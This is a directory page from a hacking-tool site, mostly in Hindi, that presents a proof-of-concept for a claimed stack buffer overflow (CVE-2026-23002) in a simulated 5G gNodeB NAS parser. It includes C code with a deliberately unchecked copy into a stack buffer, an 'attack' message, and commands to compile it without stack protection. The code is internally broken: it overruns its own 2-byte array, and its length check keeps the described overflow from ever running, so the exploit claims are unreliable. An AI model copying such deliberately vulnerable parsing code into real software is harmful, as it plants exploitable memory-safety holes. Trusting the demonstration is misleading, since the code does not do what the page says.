Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-23002-5G-NAS-Message-Buffer-Overflow-in-gNodeB — अनुकरणित 5G gNodeB NAS पार्सर जिसमें CVE-2026-23002 के लिए स्टैक बफर ओवरफ्लो PoC शामिल है; एक विशेष रूप से तैयार NAS संदेश रिमोट कोड निष्पादन को ट्रिगर करता है। | Kitploit
उपकरण/GitHubGitHub/george0papasotiriou/cve-2026-23002-5g-nas-message-buffer-overflow-in-gnodeb
एम्बेडेड सिस्टम सुरक्षाभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षाबाइनरी शोषण
GitHubgeorge0papasotiriou/cve-2026-23002-5g-nas-message-buffer-overflow-in-gnodeb

CVE-2026-23002-5G-NAS-Message-Buffer-Overflow-in-gNodeB

अनुकरणित 5G gNodeB NAS पार्सर जिसमें CVE-2026-23002 के लिए स्टैक बफर ओवरफ्लो PoC शामिल है; एक विशेष रूप से तैयार NAS संदेश रिमोट कोड निष्पादन को ट्रिगर करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
15 दिन पहलेअभी तक समीक्षित नहीं

CVE-2026-23002 – gNodeB में 5G NAS संदेश बफर ओवरफ्लो

प्रोग्राम कोड (C सिमुलेशन)

root@kitploit:~
// gnb_nas_sim.c - Simulated 5G gNodeB parsing NAS Registration Request
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define MAX_IE_SIZE 128

void process_registration_request(uint8_t *nas_msg, uint16_t length) {
    uint8_t ie_buffer[MAX_IE_SIZE];
    // Read IE length from message; if length > MAX_IE_SIZE, buffer overflow
    uint16_t ie_length = (nas_msg[0] << 8) | nas_msg[1];
    if (ie_length > 0 && ie_length <= length - 2) {
        memcpy(ie_buffer, nas_msg + 2, ie_length); // no bounds check!
        printf("IE copied, size %d\n", ie_length);
    }
}

int main() {
    // Craft a NAS message with an oversized IE length
    uint8_t attack[] = {0x01, 0x00}; // IE length = 256, but buffer is only 128 bytes
    // Append padding to make length consistent
    memset(attack+2, 'A', 254);
    process_registration_request(attack, sizeof(attack));
    return 0;
}

CVE-2026-23002 – gNodeB में 5G NAS संदेश बफर ओवरफ्लो

Severity: Critical

अवलोकन

सिम्युलेटेड gNodeB में 5G नॉन-एक्सेस स्ट्रेटम (NAS) पार्सर सूचना तत्व (Information Element) लंबाई फ़ील्ड को मान्य नहीं करता है। हमलावर द्वारा भेजा गया एक क्राफ्टेड Registration Request स्टैक बफर को ओवरफ्लो कर सकता है, जिससे बेस स्टेशन पर रिमोट कोड निष्पादन हो सकता है।

भेद्यता विवरण

  • प्रकार: स्टैक बफर ओवरफ्लो
  • प्रभाव: बेस स्टेशन से पूर्ण समझौता, नेटवर्क व्यवधान।
  • मूल कारण: NAS IE लंबाई को गंतव्य बफर आकार के विरुद्ध बाउंड जाँच के बिना विश्वसनीय माना जाता है।

एक्सप्लॉइट प्रदर्शन

भेद्य पार्सर को संकलित करें और चलाएं:

root@kitploit:~
gcc -o gnb_nas_sim gnb_nas_sim.c -fno-stack-protector
./gnb_nas_sim

प्रोग्राम सेग्मेंटेशन फॉल्ट (स्टैक भ्रष्टाचार) के साथ क्रैश हो जाता है।

टूल डाउनलोड करें